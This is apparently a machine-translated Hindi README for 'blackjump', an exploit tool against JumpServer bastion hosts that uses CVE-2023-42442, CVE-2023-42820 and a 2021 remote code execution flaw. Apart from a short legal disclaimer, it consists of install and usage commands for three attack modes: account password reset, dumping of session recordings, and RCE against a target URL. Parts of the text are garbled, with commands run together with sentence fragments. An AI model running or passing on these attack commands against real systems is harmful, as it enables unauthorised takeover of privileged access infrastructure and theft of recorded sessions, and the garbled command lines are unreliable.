
JumpServer बैस्टियन होस्ट अनधिकृत व्यापक भेद्यता शोषण, CVE-2023-42442 / CVE-2023-42820 / RCE 2021 के लिए शोषण
अस्वीकरण: यह उपकरण केवल कानूनी रूप से अधिकृत उद्यम सुरक्षा निर्माण गतिविधियों के लिए है। इस उपकरण का उपयोग करते समय, आपको यह सुनिश्चित करना होगा कि यह कार्य स्थानीय कानूनों और विनियमों के अनुरूप है, और आपके पास पर्याप्त प्राधिकरण है। कृपया अनधिकृत लक्ष्यों पर उपयोग न करें।
यदि आप इस उपकरण का उपयोग करते समय कोई अवैध कार्य करते हैं, तो आपको स्वयं परिणाम भुगतने होंगे, हम कोई कानूनी या संयुक्त दायित्व नहीं लेंगे।
JumpServer बैस्टियन होस्ट व्यापक शोषण
python3 -m pip install -r requirements.txt
--user और पैरामीटर निर्दिष्ट कर सकते हैं--emailpython3 blackjump.py reset https://vulerability

output/ निर्देशिका में <uuid4>.tar फ़ाइल को jumpserver प्लेयर में चलाएँpython3 blackjump.py dump https://vulerability
e
python3 blackjump.py rce http(s)://vulerability

python3 blackjump.py {reset,dump,rce} -h